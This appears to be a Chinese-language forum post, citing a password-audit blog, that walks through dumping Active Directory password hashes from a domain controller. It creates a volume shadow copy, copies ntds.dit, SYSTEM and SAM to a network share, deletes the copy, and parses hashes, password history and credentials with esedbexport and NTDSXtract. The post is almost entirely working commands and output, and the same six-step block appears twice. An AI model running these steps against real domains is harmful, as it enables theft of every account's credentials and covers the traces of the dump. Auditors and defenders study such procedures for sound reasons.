参考:[url]http://blog.cyberis.co.uk/2012/06/password-audit-of-domain-controller.html[/url]
1. 创建Shadow Copy
[quote]
cscript vssown.vbs /start
cscript vssown.vbs /create c
cscript vssown.vbs /list
[/quote]
2. 从shadow copy中copy文件
[quote]
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit \\<some network share>\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM \\<some network share>\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM \\<some network share>\
[/quote]
3. 删除创建的shadow copy
[quote]cscript vssown.vbs /delete <ID>[/quote]
4. 从[url]http://sourceforge.net/projects/libesedb/[/url]下载libesedb
5. 从ntds.dit中提取数据库表
[quote]
$ esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit.export <ntds.dit file>
Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
[/quote]
6. 使用NTDSXtract解析表
[quote]
~/NTDSXtract $ python dsusers.py /tmp/ntds.dit.export/datatable.3 /tmp/ntds.dit.export/link_table.5 --passwordhashes <SYSTEM file> --passwordhistory <SYSTEM file> --certificates --supplcreds <SYSTEM file> --membership > /tmp/ntds.dit.output
[/quote]
1. 创建Shadow Copy
[quote]
cscript vssown.vbs /start
cscript vssown.vbs /create c
cscript vssown.vbs /list
[/quote]
2. 从shadow copy中copy文件
[quote]
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit \\<some network share>\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM \\<some network share>\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM \\<some network share>\
[/quote]
3. 删除创建的shadow copy
[quote]cscript vssown.vbs /delete <ID>[/quote]
4. 从[url]http://sourceforge.net/projects/libesedb/[/url]下载libesedb
5. 从ntds.dit中提取数据库表
[quote]
$ esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit.export <ntds.dit file>
Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
[/quote]
6. 使用NTDSXtract解析表
[quote]
~/NTDSXtract $ python dsusers.py /tmp/ntds.dit.export/datatable.3 /tmp/ntds.dit.export/link_table.5 --passwordhashes <SYSTEM file> --passwordhistory <SYSTEM file> --certificates --supplcreds <SYSTEM file> --membership > /tmp/ntds.dit.output
[/quote]